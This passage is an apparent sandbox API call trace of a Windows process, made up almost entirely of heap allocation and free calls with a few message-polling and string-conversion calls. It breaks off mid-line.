[0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0147.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0147.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0147.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0147.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0147.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0147.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0147.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0147.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0147.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0147.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0147.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0147.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0147.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0147.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0147.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0147.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0147.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0147.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0147.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0147.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e88 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0147.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0147.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0147.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0147.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0147.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0147.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0147.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0147.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0147.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0147.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0147.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0147.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0147.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0147.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0147.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0147.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0147.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0147.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0147.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0147.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0147.474] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0147.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0147.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0147.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0147.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0147.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0147.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0147.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0147.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0147.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0147.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e68 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0147.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0147.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0147.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0147.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0147.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0147.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0147.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0147.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0147.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0147.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0147.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0147.476] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0147.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0147.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0147.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0147.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0147.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0147.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0147.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0147.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0147.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0147.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0147.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0147.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0147.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0147.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d78 [0147.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0147.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0147.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0147.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0147.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0147.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0147.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0147.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0147.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d48 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0147.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0147.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0147.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0147.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0147.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0147.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0147.538] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0147.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0147.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0147.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0147.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0147.538] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0147.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0147.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0147.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0147.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0147.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0147.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0147.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0147.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0147.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0147.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0147.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0147.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0147.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0147.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.539] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0147.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) 